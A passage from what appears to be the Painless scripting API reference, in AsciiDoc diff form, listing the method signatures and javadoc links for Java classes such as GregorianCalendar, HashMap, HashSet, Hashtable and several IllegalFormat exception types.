{java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-GregorianCalendar]] -==== GregorianCalendar -* static int {java11-javadoc}/java.base/java/util/GregorianCalendar.html#AD[AD] -* static int {java11-javadoc}/java.base/java/util/GregorianCalendar.html#BC[BC] -* static GregorianCalendar {java11-javadoc}/java.base/java/util/GregorianCalendar.html#from(java.time.ZonedDateTime)[from](ZonedDateTime) -* {java11-javadoc}/java.base/java/util/GregorianCalendar.html#()[GregorianCalendar]() -* {java11-javadoc}/java.base/java/util/GregorianCalendar.html#(java.util.TimeZone)[GregorianCalendar](TimeZone) -* {java11-javadoc}/java.base/java/util/GregorianCalendar.html#(java.util.TimeZone,java.util.Locale)[GregorianCalendar](TimeZone, Locale) -* {java11-javadoc}/java.base/java/util/GregorianCalendar.html#(int,int,int)[GregorianCalendar](int, int, int) -* {java11-javadoc}/java.base/java/util/GregorianCalendar.html#(int,int,int,int,int)[GregorianCalendar](int, int, int, int, int) -* {java11-javadoc}/java.base/java/util/GregorianCalendar.html#(int,int,int,int,int,int)[GregorianCalendar](int, int, int, int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#add(int,int)[add](int, int) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#after(java.lang.Object)[after](Object) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#before(java.lang.Object)[before](Object) -* void {java11-javadoc}/java.base/java/util/Calendar.html#clear()[clear]() -* void {java11-javadoc}/java.base/java/util/Calendar.html#clear(int)[clear](int) -* def {java11-javadoc}/java.base/java/util/Calendar.html#clone()[clone]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#compareTo(java.util.Calendar)[compareTo](Calendar) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/Calendar.html#get(int)[get](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getActualMaximum(int)[getActualMaximum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getActualMinimum(int)[getActualMinimum](int) -* null {java11-javadoc}/java.base/java/util/Calendar.html#getCalendarType()[getCalendarType]() -* null {java11-javadoc}/java.base/java/util/Calendar.html#getDisplayName(int,int,java.util.Locale)[getDisplayName](int, int, Locale) -* Map {java11-javadoc}/java.base/java/util/Calendar.html#getDisplayNames(int,int,java.util.Locale)[getDisplayNames](int, int, Locale) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getFirstDayOfWeek()[getFirstDayOfWeek]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getGreatestMinimum(int)[getGreatestMinimum](int) -* Date {java11-javadoc}/java.base/java/util/GregorianCalendar.html#getGregorianChange()[getGregorianChange]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getLeastMaximum(int)[getLeastMaximum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getMaximum(int)[getMaximum](int) -* int {java11-javadoc}/java.base/java/util/Calendar.html#getMinimalDaysInFirstWeek()[getMinimalDaysInFirstWeek]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getMinimum(int)[getMinimum](int) -* Date {java11-javadoc}/java.base/java/util/Calendar.html#getTime()[getTime]() -* long {java11-javadoc}/java.base/java/util/Calendar.html#getTimeInMillis()[getTimeInMillis]() -* TimeZone {java11-javadoc}/java.base/java/util/Calendar.html#getTimeZone()[getTimeZone]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getWeekYear()[getWeekYear]() -* int {java11-javadoc}/java.base/java/util/Calendar.html#getWeeksInWeekYear()[getWeeksInWeekYear]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/GregorianCalendar.html#isLeapYear(int)[isLeapYear](int) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#isLenient()[isLenient]() -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#isSet(int)[isSet](int) -* boolean {java11-javadoc}/java.base/java/util/Calendar.html#isWeekDateSupported()[isWeekDateSupported]() -* void {java11-javadoc}/java.base/java/util/Calendar.html#roll(int,int)[roll](int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int)[set](int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int,int)[set](int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int,int,int,int)[set](int, int, int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#set(int,int,int,int,int,int)[set](int, int, int, int, int, int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setFirstDayOfWeek(int)[setFirstDayOfWeek](int) -* void {java11-javadoc}/java.base/java/util/GregorianCalendar.html#setGregorianChange(java.util.Date)[setGregorianChange](Date) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setLenient(boolean)[setLenient](boolean) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setMinimalDaysInFirstWeek(int)[setMinimalDaysInFirstWeek](int) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setTime(java.util.Date)[setTime](Date) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setTimeInMillis(long)[setTimeInMillis](long) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setTimeZone(java.util.TimeZone)[setTimeZone](TimeZone) -* void {java11-javadoc}/java.base/java/util/Calendar.html#setWeekDate(int,int,int)[setWeekDate](int, int, int) -* Instant {java11-javadoc}/java.base/java/util/Calendar.html#toInstant()[toInstant]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* ZonedDateTime {java11-javadoc}/java.base/java/util/GregorianCalendar.html#toZonedDateTime()[toZonedDateTime]() - - -[[painless-api-reference-shared-HashMap]] -==== HashMap -* {java11-javadoc}/java.base/java/util/HashMap.html#()[HashMap]() -* {java11-javadoc}/java.base/java/util/HashMap.html#(java.util.Map)[HashMap](Map) -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/HashMap.html#clone()[clone]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-HashSet]] -==== HashSet -* {java11-javadoc}/java.base/java/util/HashSet.html#()[HashSet]() -* {java11-javadoc}/java.base/java/util/HashSet.html#(java.util.Collection)[HashSet](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#add(java.lang.Object)[add](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#addAll(java.util.Collection)[addAll](Collection) -* boolean any(Predicate) -* Collection asCollection() -* List asList() -* void {java11-javadoc}/java.base/java/util/Collection.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/HashSet.html#clone()[clone]() -* List collect(Function) -* def collect(Collection, Function) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#contains(java.lang.Object)[contains](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#containsAll(java.util.Collection)[containsAll](Collection) -* def each(Consumer) -* def eachWithIndex(ObjIntConsumer) -* boolean {java11-javadoc}/java.base/java/util/Set.html#equals(java.lang.Object)[equals](Object) -* boolean every(Predicate) -* def find(Predicate) -* List findAll(Predicate) -* def findResult(Function) -* def findResult(def, Function) -* List findResults(Function) -* void {java11-javadoc}/java.base/java/lang/Iterable.html#forEach(java.util.function.Consumer)[forEach](Consumer) -* Map groupBy(Function) -* int {java11-javadoc}/java.base/java/util/Set.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Collection.html#isEmpty()[isEmpty]() -* Iterator {java11-javadoc}/java.base/java/lang/Iterable.html#iterator()[iterator]() -* null join(null) -* boolean {java11-javadoc}/java.base/java/util/Set.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeAll(java.util.Collection)[removeAll](Collection) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#removeIf(java.util.function.Predicate)[removeIf](Predicate) -* boolean {java11-javadoc}/java.base/java/util/Collection.html#retainAll(java.util.Collection)[retainAll](Collection) -* int {java11-javadoc}/java.base/java/util/Collection.html#size()[size]() -* List split(Predicate) -* Spliterator {java11-javadoc}/java.base/java/util/Collection.html#spliterator()[spliterator]() -* Stream {java11-javadoc}/java.base/java/util/Collection.html#stream()[stream]() -* double sum() -* double sum(ToDoubleFunction) -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray()[toArray]() -* def[] {java11-javadoc}/java.base/java/util/Collection.html#toArray(java.lang.Object%5B%5D)[toArray](def[]) -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Hashtable]] -==== Hashtable -* {java11-javadoc}/java.base/java/util/Hashtable.html#()[Hashtable]() -* {java11-javadoc}/java.base/java/util/Hashtable.html#(java.util.Map)[Hashtable](Map) -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/Hashtable.html#clone()[clone]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Enumeration {java11-javadoc}/java.base/java/util/Dictionary.html#elements()[elements]() -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* Enumeration {java11-javadoc}/java.base/java/util/Dictionary.html#keys()[keys]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-IdentityHashMap]] -==== IdentityHashMap -* {java11-javadoc}/java.base/java/util/IdentityHashMap.html#()[IdentityHashMap]() -* {java11-javadoc}/java.base/java/util/IdentityHashMap.html#(java.util.Map)[IdentityHashMap](Map) -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/IdentityHashMap.html#clone()[clone]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int {java11-javadoc}/java.base/java/util/Map.html#size()[size]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() -* Collection {java11-javadoc}/java.base/java/util/Map.html#values()[values]() - - -[[painless-api-reference-shared-IllegalFormatCodePointException]] -==== IllegalFormatCodePointException -* {java11-javadoc}/java.base/java/util/IllegalFormatCodePointException.html#(int)[IllegalFormatCodePointException](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/IllegalFormatCodePointException.html#getCodePoint()[getCodePoint]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalFormatConversionException]] -==== IllegalFormatConversionException -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* char {java11-javadoc}/java.base/java/util/IllegalFormatConversionException.html#getConversion()[getConversion]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalFormatException]] -==== IllegalFormatException -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalFormatFlagsException]] -==== IllegalFormatFlagsException -* {java11-javadoc}/java.base/java/util/IllegalFormatFlagsException.html#(java.lang.String)[IllegalFormatFlagsException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/util/IllegalFormatFlagsException.html#getFlags()[getFlags]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalFormatPrecisionException]] -==== IllegalFormatPrecisionException -* {java11-javadoc}/java.base/java/util/IllegalFormatPrecisionException.html#(int)[IllegalFormatPrecisionException](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* int {java11-javadoc}/java.base/java/util/IllegalFormatPrecisionException.html#getPrecision()[getPrecision]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllegalFormatWidthException]] -==== IllegalFormatWidthException -* {java11-javadoc}/java.base/java/util/IllegalFormatWidthException.html#(int)[IllegalFormatWidthException](int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/util/IllegalFormatWidthException.html#getWidth()[getWidth]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IllformedLocaleException]] -==== IllformedLocaleException -* {java11-javadoc}/java.base/java/util/IllformedLocaleException.html#()[IllformedLocaleException]() -* {java11-javadoc}/java.base/java/util/IllformedLocaleException.html#(java.lang.String)[IllformedLocaleException](null) -* {java11-javadoc}/java.base/java/util/IllformedLocaleException.html#(java.lang.String,int)[IllformedLocaleException](null, int) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* int {java11-javadoc}/java.base/java/util/IllformedLocaleException.html#getErrorIndex()[getErrorIndex]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-InputMismatchException]] -==== InputMismatchException -* {java11-javadoc}/java.base/java/util/InputMismatchException.html#()[InputMismatchException]() -* {java11-javadoc}/java.base/java/util/InputMismatchException.html#(java.lang.String)[InputMismatchException](null) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getLocalizedMessage()[getLocalizedMessage]() -* null {java11-javadoc}/java.base/java/lang/Throwable.html#getMessage()[getMessage]() -* StackTraceElement[] {java11-javadoc}/java.base/java/lang/Throwable.html#getStackTrace()[getStackTrace]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-IntSummaryStatistics]] -==== IntSummaryStatistics -* {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#()[IntSummaryStatistics]() -* void {java11-javadoc}/java.base/java/util/function/IntConsumer.html#accept(int)[accept](int) -* IntConsumer {java11-javadoc}/java.base/java/util/function/IntConsumer.html#andThen(java.util.function.IntConsumer)[andThen](IntConsumer) -* void {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#combine(java.util.IntSummaryStatistics)[combine](IntSummaryStatistics) -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* double {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#getAverage()[getAverage]() -* long {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#getCount()[getCount]() -* int {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#getMax()[getMax]() -* int {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#getMin()[getMin]() -* long {java11-javadoc}/java.base/java/util/IntSummaryStatistics.html#getSum()[getSum]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-Iterator]] -==== Iterator -* boolean {java11-javadoc}/java.base/java/lang/Object.html#equals(java.lang.Object)[equals](Object) -* void {java11-javadoc}/java.base/java/util/Iterator.html#forEachRemaining(java.util.function.Consumer)[forEachRemaining](Consumer) -* boolean {java11-javadoc}/java.base/java/util/Iterator.html#hasNext()[hasNext]() -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* def {java11-javadoc}/java.base/java/util/Iterator.html#next()[next]() -* void {java11-javadoc}/java.base/java/util/Iterator.html#remove()[remove]() -* null {java11-javadoc}/java.base/java/lang/Object.html#toString()[toString]() - - -[[painless-api-reference-shared-LinkedHashMap]] -==== LinkedHashMap -* {java11-javadoc}/java.base/java/util/LinkedHashMap.html#()[LinkedHashMap]() -* {java11-javadoc}/java.base/java/util/LinkedHashMap.html#(java.util.Map)[LinkedHashMap](Map) -* void {java11-javadoc}/java.base/java/util/Map.html#clear()[clear]() -* def {java11-javadoc}/java.base/java/util/HashMap.html#clone()[clone]() -* List collect(BiFunction) -* def collect(Collection, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#compute(java.lang.Object,java.util.function.BiFunction)[compute](def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfAbsent(java.lang.Object,java.util.function.Function)[computeIfAbsent](def, Function) -* def {java11-javadoc}/java.base/java/util/Map.html#computeIfPresent(java.lang.Object,java.util.function.BiFunction)[computeIfPresent](def, BiFunction) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsKey(java.lang.Object)[containsKey](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#containsValue(java.lang.Object)[containsValue](def) -* int count(BiPredicate) -* def each(BiConsumer) -* Set {java11-javadoc}/java.base/java/util/Map.html#entrySet()[entrySet]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#equals(java.lang.Object)[equals](Object) -* boolean every(BiPredicate) -* Map.Entry find(BiPredicate) -* Map findAll(BiPredicate) -* def findResult(BiFunction) -* def findResult(def, BiFunction) -* List findResults(BiFunction) -* void {java11-javadoc}/java.base/java/util/Map.html#forEach(java.util.function.BiConsumer)[forEach](BiConsumer) -* def {java11-javadoc}/java.base/java/util/Map.html#get(java.lang.Object)[get](def) -* Object getByPath(null) -* Object getByPath(null, Object) -* def {java11-javadoc}/java.base/java/util/Map.html#getOrDefault(java.lang.Object,java.lang.Object)[getOrDefault](def, def) -* Map groupBy(BiFunction) -* int {java11-javadoc}/java.base/java/lang/Object.html#hashCode()[hashCode]() -* boolean {java11-javadoc}/java.base/java/util/Map.html#isEmpty()[isEmpty]() -* Set {java11-javadoc}/java.base/java/util/Map.html#keySet()[keySet]() -* def {java11-javadoc}/java.base/java/util/Map.html#merge(java.lang.Object,java.lang.Object,java.util.function.BiFunction)[merge](def, def, BiFunction) -* def {java11-javadoc}/java.base/java/util/Map.html#put(java.lang.Object,java.lang.Object)[put](def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#putAll(java.util.Map)[putAll](Map) -* def {java11-javadoc}/java.base/java/util/Map.html#putIfAbsent(java.lang.Object,java.lang.Object)[putIfAbsent](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object)[remove](def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#remove(java.lang.Object,java.lang.Object)[remove](def, def) -* def {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object)[replace](def, def) -* boolean {java11-javadoc}/java.base/java/util/Map.html#replace(java.lang.Object,java.lang.Object,java.lang.Object)[replace](def, def, def) -* void {java11-javadoc}/java.base/java/util/Map.html#replaceAll(java.util.function.BiFunction)[replaceAll](BiFunction) -* int 